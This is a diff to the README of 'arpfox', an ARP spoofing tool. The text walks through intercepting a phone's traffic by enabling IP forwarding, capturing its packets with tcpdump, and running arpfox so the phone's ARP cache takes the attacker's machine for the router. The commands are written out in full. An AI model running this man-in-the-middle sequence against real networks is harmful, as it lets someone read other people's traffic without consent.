malfunkt/arpfox/README.md

 sudo sysctl -w net.ipv4.ip_forward=1
 ```

-And besides forwarding, Alice also wants to see what's going on with
+Besides forwarding, Alice also wants to see what's going on with unencrypted
-unencrypted traffic, so she instructs `tcpdump` to display packets coming from
+traffic, so she instructs `tcpdump` to display packets coming from the phone:
-the phone:

 ```
 tcpdump -i en0 -A -n "src host 10.0.0.101 and (dst port 80 or dst port 443)"
 ```

-At this point, the phone's ARP table looks like this:
+At this point Alice hasn't started `arpfox` yet and the phone's ARP table still
+looks like this:

 ```
 # 10.0.0.1's legitimate MAC address on the phone.
 ?
 (10.0.0.1) at 11:22:33:44:55:66 on wlan0 expires in 857 seconds [ethernet]
 ```

-and she's prepared to use `arpfox`:
+Now she's ready to use `arpfox`:

 ```
 # arpfox -i [network interface] -t [target] [host]
 arpfox -i en0 -t 10.0.0.101 10.0.0.1
 ```

+`-i en0` tells `arpfox` to use the `en0` network interface and `-t 10.0.0.101
-`-t 10.0.0.101 10.0.0.1` tells `arpfox` to send unsolicited ARP replies to the
+10.0.0.1` tells `arpfox` to send unsolicited ARP replies to the phone
-phone (`10.0.0.101`) posing as the router (`10.0.0.1`).
+(`10.0.0.101`) posing as the router (`10.0.0.1`).

-After a few seconds, the phone's ARP table gets altered and the phone now
+After a few seconds, the phone's ARP table will get altered and the phone will
-thinks Alice's machine is the router:
+think Alice's machine is the router:

 ```
 # 10.0.0.1's MAC address was changed on the phone.